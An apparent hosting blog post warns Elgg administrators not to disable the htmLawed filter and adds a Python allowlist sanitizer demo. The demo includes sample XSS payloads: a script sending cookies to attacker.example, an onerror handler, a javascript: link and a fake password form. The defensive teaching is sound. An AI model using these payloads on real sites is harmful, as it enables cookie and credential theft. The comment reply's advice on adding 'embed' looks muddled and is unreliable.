Protecting Your Elgg Site

Some people are telling Elgg users to disable the “HTMLAWED” plugin (a plugin that is bundled with every Elgg install) so that they can embed content. This is not recommended.

The plugin mentioned above filters the HTML that users submit. Without it, anyone who can post content can add arbitrary HTML or script code that could break your site design and could even let phishers embed code that steals other users' passwords.

So, no matter what someone says, do not disable HTMLAWED. Doing so could not only harm your website but also harm or overload our servers. Not so long ago there was a website on which someone uploaded a PHP script that overloaded one of Arvixe’s servers. It turned out that HTMLAWED was disabled and someone had added harmful code to the site.
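To make concrete what such a filter protects against, here is an added example that is not htmLawed or Elgg code (and is far simpler than htmLawed): a small allowlist sanitizer written in Python, run over a constructed post that carries a cookie-stealing script, an onerror handler, a javascript: link and a fake login form. The allowlist, the hostname attacker.example and the sample post are all constructed for this example; the render_post helper only shows what reaches other users' browsers with the filter on versus off.

```python
"""Allowlist HTML sanitizer illustrating what an htmLawed-style filter does
for a user-submitted Elgg post. Added example, not htmLawed or Elgg code."""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist chosen for this example; a real deployment tunes these lists.
ALLOWED_TAGS = {"p", "br", "a", "b", "i", "em", "strong", "img",
                "ul", "ol", "li", "blockquote", "code"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}
CONTENT_DROPPED = {"script", "style"}   # element and everything inside it go


def safe_url(value):
    """Reject javascript:, data:, vbscript: and similar schemes.
    Whitespace and control characters are removed before deciding, so
    'java\\tscript:' and ' JavaScript:' are caught as well."""
    stripped = re.sub(r"[\x00-\x20\x7f]", "", value)
    scheme = urlparse(stripped).scheme   # urlparse lower-cases the scheme
    return scheme == "" or scheme in ALLOWED_SCHEMES


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []     # audit trail: "tag" or "tag@attr"
        self.suppress = 0     # > 0 while inside <script> / <style>

    def handle_starttag(self, tag, attrs):
        if tag in CONTENT_DROPPED:
            self.suppress += 1
            self.dropped.append(tag)
            return
        if self.suppress:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)   # tag removed, its text content is kept
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            ok = name in ALLOWED_ATTRS.get(tag, set()) and not name.startswith("on")
            if ok and name in URL_ATTRS:
                ok = safe_url(value)
            if ok:
                kept.append(f' {name}="{escape(value, quote=True)}"')
            else:
                self.dropped.append(f"{tag}@{name}")
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in CONTENT_DROPPED:
            self.suppress = max(0, self.suppress - 1)
            return
        if self.suppress or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.suppress:
            self.out.append(escape(data, quote=False))
    # Comments, doctype and processing instructions fall through to the
    # base-class no-op handlers and are therefore dropped.


def sanitize(user_html):
    """Return (clean_html, dropped); dropped lists removed tags/attributes."""
    parser = AllowlistSanitizer()
    parser.feed(user_html)
    parser.close()
    return "".join(parser.out), parser.dropped


def render_post(user_html, filter_enabled=True):
    """What other users' browsers receive. With the filter disabled (what the
    post above warns against) the submitted markup is served verbatim."""
    return sanitize(user_html)[0] if filter_enabled else user_html


# Constructed phishing post; attacker.example is a reserved, fictitious host.
PHISHING_POST = (
    "<p>Check out my <b>photos</b>!</p>"
    "<script>location='https://attacker.example/?c='+document.cookie</script>"
    '<img src="x" onerror="alert(document.cookie)">'
    '<a href="javascript:alert(1)">click</a>'
    '<form action="https://attacker.example/login"><input name="password"></form>'
)

if __name__ == "__main__":
    clean, dropped = sanitize(PHISHING_POST)
    print(clean)
    print("removed:", dropped)
```

The script element is removed together with its body, the onerror handler and the javascript: href are stripped while the harmless img and a tags survive, and the credential-harvesting form disappears entirely; with filter_enabled=False every one of those payloads is stored and served to the next visitor.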

For more info about Elgg hosting solutions please visit Arvixe-Elgg Hosting

Happy Hosting!

Rodolfo Hernandez


Author Spotlight

Rodolfo Hernandez

I like photography and reading books. Currently working for Arvixe as Elgg Community Liaison. Elgg Security Expert, Web Security Expert, CEO of UDP SW Social Web.

2 Comments on Protecting Your Elgg Site

  1. Rapid Search says:

    Excuse me, how do I configure htmlawed to allow media embeds?
    Thanks in advance.

  2. Rodolfo Hernandez says:

    Go to mod/htmlawed

    Open the file start.php

    Look for this line:

    'schemes' => '*: http,https,ftp,news,mailto,rtsp,teamspeak,gopher,mms,callto;'
    . 'style: color,cursor,text-align,font-size,font-weight,font-style,border,margin,padding,float'

    Add any needed HTML tag. For instance, after “float” we add “embed” so that we can embed content in Elgg.
